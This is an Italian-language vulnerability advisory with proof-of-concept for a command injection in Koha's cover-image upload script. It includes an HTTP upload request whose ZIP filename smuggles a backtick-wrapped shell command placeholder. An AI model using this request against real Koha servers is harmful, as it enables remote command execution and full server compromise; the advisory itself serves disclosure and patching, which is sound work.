
Advisory e proof-of-concept per CVE-2024-36057, un'iniezione di comandi OS autenticata in Koha Library Software, che dimostra l'esecuzione arbitraria di comandi tramite nomi di file ZIP appositamente predisposti.
ID CVE: CVE-2024-36057
Prodotto: Koha Library Software
Tipo di Vulnerabilità: Iniezione di Comandi del Sistema Operativo (CWE-78)
Punteggio CVSS: 8.7 (Alto) Autenticato
Versioni Interessate: Inferiori alla 22.05.22
Crediti: Karolis Narvilas
Koha è un sistema bibliotecario integrato open-source. Esiste una vulnerabilità di iniezione di comandi nella funzionalità di caricamento delle immagini di copertina in tools/upload-cover-image.pl. L'applicazione utilizza qx/unzip $filename -d $dirname/ per estrarre archivi ZIP caricati senza sanificare il parametro del nome file.
Un utente autenticato con privilegi elevati può creare un file ZIP con un nome file dannoso contenente caratteri backtick per iniettare comandi shell arbitrari, che vengono eseguiti lato server quando l'utente fa clic su "Process Images".
Impatto: Un attaccante remoto autenticato può sfruttare CVE-2024-36057 per eseguire comandi arbitrari del sistema operativo sul server sottostante, portando al compromesso completo del sistema, all'esfiltrazione di dati e all'installazione di backdoor persistenti o reverse shell.
https://{dominio}/cgi-bin/koha/tools/upload-cover-image.plRichiesta:
POST /cgi-bin/koha/tools/upload-file.pl?temp=1 HTTP/1.1
Host: {dominio}
Cookie: [Sessione con Privilegi Elevati]
Connection: close
------WebKitFormBoundaryP82Da5V6eaQOuBUT
Content-Disposition: form-data; name="file"; filename="execute`<COMANDO_INIETTATO>`.zip"
Content-Type: application/x-zip-compressed
<contenuto del file zip>
------WebKitFormBoundaryP82Da5V6eaQOuBUT--
